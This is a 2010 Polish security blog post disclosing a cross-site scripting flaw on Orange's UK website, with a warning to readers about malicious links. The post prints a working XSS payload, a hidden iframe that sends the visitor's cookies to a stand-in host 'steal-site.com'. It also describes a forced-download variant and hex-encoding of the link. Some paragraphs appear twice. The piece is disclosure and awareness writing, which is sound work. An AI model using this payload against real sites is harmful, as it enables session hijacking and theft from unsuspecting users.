29 stycznia 2010
Witryna Orange podatna na XSS! [przykład praktyczny]
piątek, stycznia 29, 2010 | Autor:
\m/ojtek
Brytyjska witryna potentata z branży telefonii komórkowej http://www.orange.co.uk/ podatna jest na ataki typu XSS (ang. Cross-Site Scripting). XSS polega w skrócie na osadzeniu w treści atakowanej strony kodu, który wyświetlony innym użytkownikom może doprowadzić do wykonania przez nich niepożądanych akcji. Zapraszam do zapoznania się praktycznym przykładem tego rodzaju ataku na przykładzie witryny Orange.
Luka obecna w witrynie http://www.orange.co.uk/ pozwala atakującemu na wstrzyknięcie własnego kodu HTML lub JavaScript w celu przechwycenia zawartości cookies. Poniżej można się zapoznać z ilustracją prezentującą Proof of Concept w działaniu:
Luka może również posłużyć intruzowi do podsunięcia ofierze specjalnie spreparowanego odnośnika do witryny Orange, który spowoduje u potencjalnej ofiary rozpoczęcie pobierania dowolnego pliku. Kod pozwalający na wykonanie tego typu ataku ma następującą postać:
Po heksadecymalnym zakodowaniu złośliwego kodu, ostatecznie odnośnik może przyjąć następującą formę:
Jak każdy z nas może się przekonać, jego otwarcie spowoduje rozpoczęcie pobierania pliku winamp5572_lite_en-us.exe!
Warto więc zawsze zachować czujność, nawet w przypadku otwierania odnośników zawierających na początku adresy znanych nam witryn!
[źródło]
iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")/iframeOdnośnik http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe może oczywiście zostać zastąpiony dowolnym innym adresem.
Po heksadecymalnym zakodowaniu złośliwego kodu, ostatecznie odnośnik może przyjąć następującą formę:
Jak każdy z nas może się przekonać, jego otwarcie spowoduje rozpoczęcie pobierania pliku winamp5572_lite_en-us.exe!
Warto więc zawsze zachować czujność, nawet w przypadku otwierania odnośników zawierających na początku adresy znanych nam witryn!
[źródło]
Witryna Orange podatna na XSS! [przykład praktyczny]
2010-01-29T17:57:00+01:00
\m/ojtek
Bezpieczeństwo aplikacji|Etyczny hacking|Obrona - Atak|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7